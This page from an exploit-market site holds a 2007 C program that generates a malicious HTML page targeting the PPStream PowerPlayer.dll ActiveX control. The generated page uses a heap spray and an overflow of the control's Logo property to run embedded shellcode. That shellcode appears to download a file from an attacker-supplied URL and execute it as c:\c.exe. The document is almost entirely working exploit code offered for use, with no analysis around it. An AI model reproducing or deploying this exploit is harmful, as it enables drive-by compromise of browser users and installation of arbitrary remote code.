[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PPStream (PowerPlayer.dll 2.0.1.3829) Activex Remote Overflow Exploit

Author
dummy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9022
Category
remote exploits
Date add
30-08-2007
Platform
unsorted
=====================================================================
PPStream (PowerPlayer.dll 2.0.1.3829) Activex Remote Overflow Exploit
=====================================================================

// author: dummy
// written by dummyz@126.com (2007)

#define _CRT_SECURE_NO_DEPRECATE

#include <windows.h>
#include <stdio.h>

const unsigned char shellcode[174] = 
{
  0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A, 
  0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F, 
  0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1, 
  0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C, 
  0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41, 
  0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03, 
  0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B, 
  0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC, 
  0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB, 
  0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00, 
  0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};

const char* script1 = \
  "<html><body><object id=\"ppc\" classid=\"clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458\"></object><script>"
  "var shellcode = unescape(\"";
const char* script2 = \
  "\");"
  "bigblock = unescape(\"%u9090\");"
  "headersize = 20;"
  "slackspace = headersize + shellcode.length;"
  "while ( bigblock.length < slackspace ) bigblock += bigblock;"
  "fillblock = bigblock.substring(0, slackspace);"
  "block = bigblock.substring(0, bigblock.length - slackspace);"
  "while(block.length + slackspace < 0x40000) block = block + block + fillblock;"
  "memory = new Array();"
  "for (x=0; x< 400; x++) memory[x] = block + shellcode;"
  "var buffer = '\\x0a';"
  "while (buffer.length < 500) buffer += '\\x0a\\x0a\\x0a\\x0a';"
  "ppc.Logo = buffer;"
  "</script>"
  "</body>"
  "</html>";

int main(int argc, char* argv[])
{
  if ( argc != 2 )
  {
    printf("ex:fuckpps url\nwritten by dummyz@126.com (2007)\n");
    return -1;
  }

  FILE *file = fopen("fuckpps.html", "w+");
  if ( file == NULL )
  {
    printf("create 'fuckpps.html' failed!\n");
    return -2;
  }

  fprintf(file, "%s", script1);
  for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
    fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);
  
  const unsigned l = strlen(argv[1]);
  for ( unsigned j = 0; j < l; j += 2 )
    fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);

  fprintf(file, "%s", script2);
  fclose(file);

  printf("make 'fuckpps.html' successed!\n");

  return 0;
}



#  0day.today [2024-12-25]  #